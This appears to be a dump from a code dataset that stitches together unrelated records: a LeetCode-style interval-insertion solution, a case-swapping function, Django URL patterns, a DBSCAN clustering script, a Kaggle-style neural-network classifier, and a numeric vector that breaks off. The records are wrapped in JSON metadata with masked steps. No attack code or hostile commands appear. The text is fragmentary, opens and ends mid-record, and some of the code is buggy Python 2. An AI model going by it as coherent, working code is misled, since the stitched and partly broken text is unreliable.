ord('q'):\n#\t\t\tbreak\n\t\n\tcap.release()\n\tcv2.destroyAllWindows()\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# Definition for an interval. # class Interval(object): # def __init__(self, s=0, e=0): # self.start = s # self.end = e class Solution(object): def insert(self, intervals, newInterval): """ :type intervals: List[Interval] :type newInterval: Interval :rtype: List[Interval] """ if not intervals: return [newInterval] starts, ends = [], [] for intv in intervals: starts.append(intv.start) ends.append(intv.end) left = self.search1(ends, newInterval.start) right = self.search2(starts, newInterval.end) print left, right if left > len(intervals) - 1: intervals.append(newInterval) elif right < 0: intervals.insert(0, newInterval) else: newInterval.start = min(newInterval.start, intervals[left].start) newInterval.end = max(newInterval.end, intervals[right].end) intervals = intervals[:left] + [newInterval] + intervals[right + 1:] return intervals def search1(self, nums, target): left, right = 0, len(nums) - 1 while left + 1 < right: mid = (left + right) / 2 if nums[mid] == target: return mid elif nums[mid] > target: right = mid else: left = mid if nums[right] < target: return right + 1 elif nums[left] < target: return right else: return left def search2(self, nums, target): left, right = 0, len(nums) - 1 while left + 1 < right: mid = (left + right) / 2 if nums[mid] == target: return mid elif nums[mid] > target: right = mid else: left = mid if nums[left] > target: return left - 1 elif nums[right] > target: return left else: return right
normal
{ "blob_id": "7dd5ac1110f38c40f2fddf9d7175a5ac40303d73", "index": 5796, "step-1": "# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n if not intervals:\n return [newInterval]\n \n starts, ends = [], []\n for intv in intervals:\n starts.append(intv.start)\n ends.append(intv.end)\n \n left = self.search1(ends, newInterval.start)\n right = self.search2(starts, newInterval.end)\n print left, right\n \n if left > len(intervals) - 1:\n intervals.append(newInterval)\n elif right < 0:\n intervals.insert(0, newInterval)\n else:\n newInterval.start = min(newInterval.start, intervals[left].start)\n newInterval.end = max(newInterval.end, intervals[right].end)\n intervals = intervals[:left] + [newInterval] + intervals[right + 1:]\n return intervals\n \n def search1(self, nums, target):\n left, right = 0, len(nums) - 1\n while left + 1 < right:\n mid = (left + right) / 2\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n right = mid\n else:\n left = mid\n \n if nums[right] < target:\n return right + 1\n elif nums[left] < target:\n return right\n else:\n return left\n \n def search2(self, nums, target):\n left, right = 0, len(nums) - 1\n while left + 1 < right:\n mid = (left + right) / 2\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n right = mid\n else:\n left = mid\n \n if nums[left] > target:\n return left - 1\n elif nums[right] > target:\n return left\n else:\n return right\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
def Return(): s = raw_input('Enter a s: ') i = 0 s1 = '' leng = len(s) while i < leng: if s[i] == s[i].lower(): s1 += s[i].upper() else: s1 += s[i].lower() i += 1 return s1 if __name__ == '__main__': print Return()
normal
{ "blob_id": "6dafb60b79a389499ae2a0f17f9618426faf45a9", "index": 8880, "step-1": "def Return():\n s = raw_input('Enter a s: ')\n i = 0\n s1 = ''\n leng = len(s)\n while i < leng:\n if s[i] == s[i].lower():\n s1 += s[i].upper()\n else:\n s1 += s[i].lower()\n i += 1\n \n return s1\n\nif __name__ == '__main__':\n \n print Return()\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
''' Can you print numbers from 1 to 100 without using any loop. ''' # Use Recursion
normal
{ "blob_id": "cc703690151acd17430b5a9715e71a694fdeca10", "index": 2116, "step-1": "<mask token>\n", "step-2": "'''\nCan you print numbers from 1 to 100 without using any loop.\n'''\n\n# Use Recursion", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
from django.urls import path from . import views app_name = 'restuarant' urlpatterns = [path('orderplaced/', views.orderplaced), path('restaurant/', views.restuarent, name='restuarant'), path('login/restaurant/', views. restLogin, name='rlogin'), path('register/restaurant/', views. restRegister, name='rregister'), path('profile/restaurant/', views. restaurantProfile, name='rprofile'), path('restaurant/create/', views. createRestaurant, name='rcreate'), path('restaurant/update/<int:id>/', views.updateRestaurant, name='rupdate'), path('restaurant/orderlist/', views.orderlist, name='orderlist'), path('restaurant/menu/', views. menuManipulation, name='mmenu'), path('logout/', views.Logout, name= 'logout'), path('restaurant/<int:pk>/', views.restuarantMenu, name= 'menu'), path('checkout/', views.checkout, name='checkout'), path( 'profile/change_password/', views.change_password, name='change_password')]
normal
{ "blob_id": "63830a3c09a2d0a267b030a336062d5e95b9a71a", "index": 3308, "step-1": "<mask token>\n", "step-2": "<mask token>\napp_name = 'restuarant'\nurlpatterns = [path('orderplaced/', views.orderplaced), path('restaurant/',\n views.restuarent, name='restuarant'), path('login/restaurant/', views.\n restLogin, name='rlogin'), path('register/restaurant/', views.\n restRegister, name='rregister'), path('profile/restaurant/', views.\n restaurantProfile, name='rprofile'), path('restaurant/create/', views.\n createRestaurant, name='rcreate'), path('restaurant/update/<int:id>/',\n views.updateRestaurant, name='rupdate'), path('restaurant/orderlist/',\n views.orderlist, name='orderlist'), path('restaurant/menu/', views.\n menuManipulation, name='mmenu'), path('logout/', views.Logout, name=\n 'logout'), path('restaurant/<int:pk>/', views.restuarantMenu, name=\n 'menu'), path('checkout/', views.checkout, name='checkout'), path(\n 'profile/change_password/', views.change_password, name='change_password')]\n", "step-3": "from django.urls import path\nfrom . import views\napp_name = 'restuarant'\nurlpatterns = [path('orderplaced/', views.orderplaced), path('restaurant/',\n views.restuarent, name='restuarant'), path('login/restaurant/', views.\n restLogin, name='rlogin'), path('register/restaurant/', views.\n restRegister, name='rregister'), path('profile/restaurant/', views.\n restaurantProfile, name='rprofile'), path('restaurant/create/', views.\n createRestaurant, name='rcreate'), path('restaurant/update/<int:id>/',\n views.updateRestaurant, name='rupdate'), path('restaurant/orderlist/',\n views.orderlist, name='orderlist'), path('restaurant/menu/', views.\n menuManipulation, name='mmenu'), path('logout/', views.Logout, name=\n 'logout'), path('restaurant/<int:pk>/', views.restuarantMenu, name=\n 'menu'), path('checkout/', views.checkout, name='checkout'), path(\n 'profile/change_password/', views.change_password, name='change_password')]\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import numpy as np import sklearn.cluster as sc import sklearn.metrics as sm import matplotlib.pyplot as mp x = np.loadtxt('C:\\Users\\Administrator\\Desktop\\sucai\\ml_data\\perf.txt', delimiter=',') # 准备训练模型相关数据 epsilons, scores, models = np.linspace(0.3, 1.2, 10), [], [] # 遍历所有的半径,训练模型,查看得分 for epsilon in epsilons: model = sc.DBSCAN(eps=epsilon, min_samples=5) model.fit(x) score = sm.silhouette_score(x, model.labels_, sample_size=len(x), metric='euclidean') scores.append(score) models.append(model) # 转成ndarray数组 scores = np.array(scores) best_i = scores.argmax() # 最优分数 best_eps = epsilons[best_i] best_sco = scores[best_i] # 获取最优模型 best_model = models[best_i] # 对输入x进行预测得到预测类别 pred_y = best_model.fit_predict(x) # 获取孤立样本,外周样本,核心样本 core_mask = np.zeros(len(x), dtype=bool) # 获取核心样本的索引,把对应位置的元素改为True core_mask[best_model.core_sample_indices_] = True # 孤立样本的类别标签为-1 offset_mask = best_model.labels_ == -1 # 外周样本掩码(不是核心也不是孤立样本) p_mask = ~(core_mask | offset_mask) # 绘制这些样本数据 mp.figure('DBSCAN cluster', facecolor='lightgray') mp.title('DBSCAN cluster', fontsize=16) mp.xlabel('x', fontsize=14) mp.ylabel('y', fontsize=14) mp.tick_params(labelsize=10) # 绘制核心样本 mp.scatter(x[core_mask][:, 0], x[core_mask][:, 1], s=60, cmap='brg', c=pred_y[core_mask]) # 绘制外周样本 mp.scatter(x[p_mask][:, 0], x[p_mask][:, 1], s=60, cmap='brg', c=pred_y[p_mask], alpha=0.5) # 绘制孤立样本 mp.scatter(x[offset_mask][:, 0], x[offset_mask][:, 1], s=60, c='gray') mp.show()
normal
{ "blob_id": "01128ebd156b24791548c50c92d2fc1969c42e70", "index": 9756, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor epsilon in epsilons:\n model = sc.DBSCAN(eps=epsilon, min_samples=5)\n model.fit(x)\n score = sm.silhouette_score(x, model.labels_, sample_size=len(x),\n metric='euclidean')\n scores.append(score)\n models.append(model)\n<mask token>\nmp.figure('DBSCAN cluster', facecolor='lightgray')\nmp.title('DBSCAN cluster', fontsize=16)\nmp.xlabel('x', fontsize=14)\nmp.ylabel('y', fontsize=14)\nmp.tick_params(labelsize=10)\nmp.scatter(x[core_mask][:, 0], x[core_mask][:, 1], s=60, cmap='brg', c=\n pred_y[core_mask])\nmp.scatter(x[p_mask][:, 0], x[p_mask][:, 1], s=60, cmap='brg', c=pred_y[\n p_mask], alpha=0.5)\nmp.scatter(x[offset_mask][:, 0], x[offset_mask][:, 1], s=60, c='gray')\nmp.show()\n", "step-3": "<mask token>\nx = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\sucai\\\\ml_data\\\\perf.txt',\n delimiter=',')\nepsilons, scores, models = np.linspace(0.3, 1.2, 10), [], []\nfor epsilon in epsilons:\n model = sc.DBSCAN(eps=epsilon, min_samples=5)\n model.fit(x)\n score = sm.silhouette_score(x, model.labels_, sample_size=len(x),\n metric='euclidean')\n scores.append(score)\n models.append(model)\nscores = np.array(scores)\nbest_i = scores.argmax()\nbest_eps = epsilons[best_i]\nbest_sco = scores[best_i]\nbest_model = models[best_i]\npred_y = best_model.fit_predict(x)\ncore_mask = np.zeros(len(x), dtype=bool)\ncore_mask[best_model.core_sample_indices_] = True\noffset_mask = best_model.labels_ == -1\np_mask = ~(core_mask | offset_mask)\nmp.figure('DBSCAN cluster', facecolor='lightgray')\nmp.title('DBSCAN cluster', fontsize=16)\nmp.xlabel('x', fontsize=14)\nmp.ylabel('y', fontsize=14)\nmp.tick_params(labelsize=10)\nmp.scatter(x[core_mask][:, 0], x[core_mask][:, 1], s=60, cmap='brg', c=\n pred_y[core_mask])\nmp.scatter(x[p_mask][:, 0], x[p_mask][:, 1], s=60, cmap='brg', c=pred_y[\n p_mask], alpha=0.5)\nmp.scatter(x[offset_mask][:, 0], x[offset_mask][:, 1], s=60, c='gray')\nmp.show()\n", "step-4": "import numpy as np\nimport sklearn.cluster as sc\nimport sklearn.metrics as sm\nimport matplotlib.pyplot as mp\nx = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\sucai\\\\ml_data\\\\perf.txt',\n delimiter=',')\nepsilons, scores, models = np.linspace(0.3, 1.2, 10), [], []\nfor epsilon in epsilons:\n model = sc.DBSCAN(eps=epsilon, min_samples=5)\n model.fit(x)\n score = sm.silhouette_score(x, model.labels_, sample_size=len(x),\n metric='euclidean')\n scores.append(score)\n models.append(model)\nscores = np.array(scores)\nbest_i = scores.argmax()\nbest_eps = epsilons[best_i]\nbest_sco = scores[best_i]\nbest_model = models[best_i]\npred_y = best_model.fit_predict(x)\ncore_mask = np.zeros(len(x), dtype=bool)\ncore_mask[best_model.core_sample_indices_] = True\noffset_mask = best_model.labels_ == -1\np_mask = ~(core_mask | offset_mask)\nmp.figure('DBSCAN cluster', facecolor='lightgray')\nmp.title('DBSCAN cluster', fontsize=16)\nmp.xlabel('x', fontsize=14)\nmp.ylabel('y', fontsize=14)\nmp.tick_params(labelsize=10)\nmp.scatter(x[core_mask][:, 0], x[core_mask][:, 1], s=60, cmap='brg', c=\n pred_y[core_mask])\nmp.scatter(x[p_mask][:, 0], x[p_mask][:, 1], s=60, cmap='brg', c=pred_y[\n p_mask], alpha=0.5)\nmp.scatter(x[offset_mask][:, 0], x[offset_mask][:, 1], s=60, c='gray')\nmp.show()\n", "step-5": "import numpy as np \nimport sklearn.cluster as sc \nimport sklearn.metrics as sm \nimport matplotlib.pyplot as mp \n\nx = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\sucai\\\\ml_data\\\\perf.txt', delimiter=',')\n\n# 准备训练模型相关数据\nepsilons, scores, models = np.linspace(0.3, 1.2, 10), [], []\n\n# 遍历所有的半径,训练模型,查看得分\nfor epsilon in epsilons:\n model = sc.DBSCAN(eps=epsilon, min_samples=5)\n model.fit(x)\n score = sm.silhouette_score(x, model.labels_, sample_size=len(x), metric='euclidean')\n scores.append(score)\n models.append(model)\n\n# 转成ndarray数组\nscores = np.array(scores)\nbest_i = scores.argmax() # 最优分数\nbest_eps = epsilons[best_i]\nbest_sco = scores[best_i]\n\n# 获取最优模型\nbest_model = models[best_i]\n# 对输入x进行预测得到预测类别\npred_y = best_model.fit_predict(x)\n# 获取孤立样本,外周样本,核心样本\ncore_mask = np.zeros(len(x), dtype=bool)\n# 获取核心样本的索引,把对应位置的元素改为True\ncore_mask[best_model.core_sample_indices_] = True\n# 孤立样本的类别标签为-1\noffset_mask = best_model.labels_ == -1\n# 外周样本掩码(不是核心也不是孤立样本)\np_mask = ~(core_mask | offset_mask)\n# 绘制这些样本数据\nmp.figure('DBSCAN cluster', facecolor='lightgray')\nmp.title('DBSCAN cluster', fontsize=16)\nmp.xlabel('x', fontsize=14)\nmp.ylabel('y', fontsize=14)\nmp.tick_params(labelsize=10)\n# 绘制核心样本\nmp.scatter(x[core_mask][:, 0], x[core_mask][:, 1], s=60, cmap='brg', c=pred_y[core_mask])\n# 绘制外周样本\nmp.scatter(x[p_mask][:, 0], x[p_mask][:, 1], s=60, cmap='brg', c=pred_y[p_mask], alpha=0.5)\n# 绘制孤立样本\nmp.scatter(x[offset_mask][:, 0], x[offset_mask][:, 1], s=60, c='gray')\nmp.show()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import pandas import numpy as np train_set = pandas.read_csv("./dataset/train.csv") test_set = pandas.read_csv("./dataset/test.csv") print(train_set) train_set = train_set.drop('id',axis=1) print(train_set.describe()) train_set['type'], categories = train_set['type'].factorize() import matplotlib.pyplot as plt print(train_set.info()) ''' fig = plt.figure(figsize=(10,5)) ax = fig.add_subplot(111) cax = ax.matshow(train_set.corr()) fig.colorbar(cax) ax.set_xticklabels(train_set.columns) ax.set_yticklabels(train_set.columns) plt.show()''' X_train = train_set.drop('type',axis=1) y_train = train_set.get('type') X_train= X_train.append(test_set) #print(X_train.info()) from sklearn.base import BaseEstimator, TransformerMixin class CreateExtraFeatures(BaseEstimator,TransformerMixin): def __init__(self):pass def fit(self,X,y=None): return self def transform(self,X,y=None): X['hair_soul'] = X['hair_length'] * X['has_soul'] X['flesh_soul'] = X['rotting_flesh'] * X['has_soul'] return np.c_[X] class DataFrameSelector(BaseEstimator, TransformerMixin): def __init__(self, attribute_names): self.attribute_names = attribute_names def fit(self, X, y=None): return self def transform(self, X): return X[self.attribute_names] from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder num_attributes = ["bone_length","rotting_flesh","hair_length","has_soul"] cat_attributes = ["color"] pipeline_num = Pipeline([ ("selector",DataFrameSelector(num_attributes)), ("extra_feat",CreateExtraFeatures()) ]) pipeline_cat = Pipeline([ ("selector", DataFrameSelector(cat_attributes)), ("categorical_encoder", OneHotEncoder(sparse=False)) ]) from sklearn.pipeline import FeatureUnion full_pipeline = FeatureUnion([ ("pip,num",pipeline_num), ("pip_cat",pipeline_cat) ]) X_train= full_pipeline.fit_transform(X_train) X_test = X_train[371:] X_train = X_train[:371] from sklearn.neural_network import MLPClassifier nn_clf = MLPClassifier(max_iter=3000) from sklearn.model_selection import GridSearchCV grid_params = [{"hidden_layer_sizes":range(3,20), "activation":['identity', 'logistic', 'tanh', 'relu'], "solver":["lbfgs","sgd","adam"],"learning_rate":["adaptive"]}] grid_search = GridSearchCV(nn_clf,param_grid=grid_params,cv=3,verbose=3, n_jobs=-1) grid_search.fit(X_train,y_train) print(grid_search.best_estimator_) print(grid_search.best_score_) #X_test = full_pipeline.fit_transform(test_set[num_attributes],test_set[cat_attributes].values) y_pred = grid_search.predict(X_test) submissions = pandas.DataFrame(y_pred, index=test_set.id,columns=["type"]) submissions["type"] = categories[submissions["type"]] submissions.to_csv('submission.csv', index=True)
normal
{ "blob_id": "ccedca543fc4dee284a9243317d028ffdeac229d", "index": 2923, "step-1": "<mask token>\n\n\nclass CreateExtraFeatures(BaseEstimator, TransformerMixin):\n <mask token>\n <mask token>\n\n def transform(self, X, y=None):\n X['hair_soul'] = X['hair_length'] * X['has_soul']\n X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']\n return np.c_[X]\n\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X):\n return X[self.attribute_names]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass CreateExtraFeatures(BaseEstimator, TransformerMixin):\n\n def __init__(self):\n pass\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n X['hair_soul'] = X['hair_length'] * X['has_soul']\n X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']\n return np.c_[X]\n\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X):\n return X[self.attribute_names]\n\n\n<mask token>\n", "step-3": "<mask token>\nprint(train_set)\n<mask token>\nprint(train_set.describe())\n<mask token>\nprint(train_set.info())\n<mask token>\n\n\nclass CreateExtraFeatures(BaseEstimator, TransformerMixin):\n\n def __init__(self):\n pass\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n X['hair_soul'] = X['hair_length'] * X['has_soul']\n X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']\n return np.c_[X]\n\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X):\n return X[self.attribute_names]\n\n\n<mask token>\ngrid_search.fit(X_train, y_train)\nprint(grid_search.best_estimator_)\nprint(grid_search.best_score_)\n<mask token>\nsubmissions.to_csv('submission.csv', index=True)\n", "step-4": "<mask token>\ntrain_set = pandas.read_csv('./dataset/train.csv')\ntest_set = pandas.read_csv('./dataset/test.csv')\nprint(train_set)\ntrain_set = train_set.drop('id', axis=1)\nprint(train_set.describe())\ntrain_set['type'], categories = train_set['type'].factorize()\n<mask token>\nprint(train_set.info())\n<mask token>\nX_train = train_set.drop('type', axis=1)\ny_train = train_set.get('type')\nX_train = X_train.append(test_set)\n<mask token>\n\n\nclass CreateExtraFeatures(BaseEstimator, TransformerMixin):\n\n def __init__(self):\n pass\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n X['hair_soul'] = X['hair_length'] * X['has_soul']\n X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']\n return np.c_[X]\n\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X):\n return X[self.attribute_names]\n\n\n<mask token>\nnum_attributes = ['bone_length', 'rotting_flesh', 'hair_length', 'has_soul']\ncat_attributes = ['color']\npipeline_num = Pipeline([('selector', DataFrameSelector(num_attributes)), (\n 'extra_feat', CreateExtraFeatures())])\npipeline_cat = Pipeline([('selector', DataFrameSelector(cat_attributes)), (\n 'categorical_encoder', OneHotEncoder(sparse=False))])\n<mask token>\nfull_pipeline = FeatureUnion([('pip,num', pipeline_num), ('pip_cat',\n pipeline_cat)])\nX_train = full_pipeline.fit_transform(X_train)\nX_test = X_train[371:]\nX_train = X_train[:371]\n<mask token>\nnn_clf = MLPClassifier(max_iter=3000)\n<mask token>\ngrid_params = [{'hidden_layer_sizes': range(3, 20), 'activation': [\n 'identity', 'logistic', 'tanh', 'relu'], 'solver': ['lbfgs', 'sgd',\n 'adam'], 'learning_rate': ['adaptive']}]\ngrid_search = GridSearchCV(nn_clf, param_grid=grid_params, cv=3, verbose=3,\n n_jobs=-1)\ngrid_search.fit(X_train, y_train)\nprint(grid_search.best_estimator_)\nprint(grid_search.best_score_)\ny_pred = grid_search.predict(X_test)\nsubmissions = pandas.DataFrame(y_pred, index=test_set.id, columns=['type'])\nsubmissions['type'] = categories[submissions['type']]\nsubmissions.to_csv('submission.csv', index=True)\n", "step-5": "import pandas\nimport numpy as np\n\ntrain_set = pandas.read_csv(\"./dataset/train.csv\")\ntest_set = pandas.read_csv(\"./dataset/test.csv\")\nprint(train_set)\ntrain_set = train_set.drop('id',axis=1)\nprint(train_set.describe())\n\ntrain_set['type'], categories = train_set['type'].factorize()\n\nimport matplotlib.pyplot as plt\nprint(train_set.info())\n'''\nfig = plt.figure(figsize=(10,5))\nax = fig.add_subplot(111)\ncax = ax.matshow(train_set.corr())\nfig.colorbar(cax)\n\nax.set_xticklabels(train_set.columns)\nax.set_yticklabels(train_set.columns)\n\nplt.show()'''\n\nX_train = train_set.drop('type',axis=1)\ny_train = train_set.get('type')\nX_train= X_train.append(test_set)\n#print(X_train.info())\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nclass CreateExtraFeatures(BaseEstimator,TransformerMixin):\n def __init__(self):pass\n\n def fit(self,X,y=None):\n return self\n def transform(self,X,y=None):\n X['hair_soul'] = X['hair_length'] * X['has_soul']\n X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']\n return np.c_[X]\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self, X):\n return X[self.attribute_names]\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import OneHotEncoder\nnum_attributes = [\"bone_length\",\"rotting_flesh\",\"hair_length\",\"has_soul\"]\ncat_attributes = [\"color\"]\n\npipeline_num = Pipeline([\n (\"selector\",DataFrameSelector(num_attributes)),\n (\"extra_feat\",CreateExtraFeatures())\n])\n\npipeline_cat = Pipeline([\n (\"selector\", DataFrameSelector(cat_attributes)),\n (\"categorical_encoder\", OneHotEncoder(sparse=False))\n])\n\nfrom sklearn.pipeline import FeatureUnion\n\nfull_pipeline = FeatureUnion([\n (\"pip,num\",pipeline_num),\n (\"pip_cat\",pipeline_cat)\n])\nX_train= full_pipeline.fit_transform(X_train)\n\nX_test = X_train[371:]\nX_train = X_train[:371]\nfrom sklearn.neural_network import MLPClassifier\n\nnn_clf = MLPClassifier(max_iter=3000)\n\nfrom sklearn.model_selection import GridSearchCV\n\ngrid_params = [{\"hidden_layer_sizes\":range(3,20), \"activation\":['identity', 'logistic', 'tanh', 'relu'], \"solver\":[\"lbfgs\",\"sgd\",\"adam\"],\"learning_rate\":[\"adaptive\"]}]\ngrid_search = GridSearchCV(nn_clf,param_grid=grid_params,cv=3,verbose=3, n_jobs=-1)\n\ngrid_search.fit(X_train,y_train)\n\nprint(grid_search.best_estimator_)\nprint(grid_search.best_score_)\n\n#X_test = full_pipeline.fit_transform(test_set[num_attributes],test_set[cat_attributes].values)\n\n\n\ny_pred = grid_search.predict(X_test)\n\nsubmissions = pandas.DataFrame(y_pred, index=test_set.id,columns=[\"type\"])\nsubmissions[\"type\"] = categories[submissions[\"type\"]]\nsubmissions.to_csv('submission.csv', index=True)\n", "step-ids": [ 6, 8, 9, 10, 12 ] }
[ 6, 8, 9, 10, 12 ]
vect = [0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 8.320673301762177, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8918202981106265, 0.0, 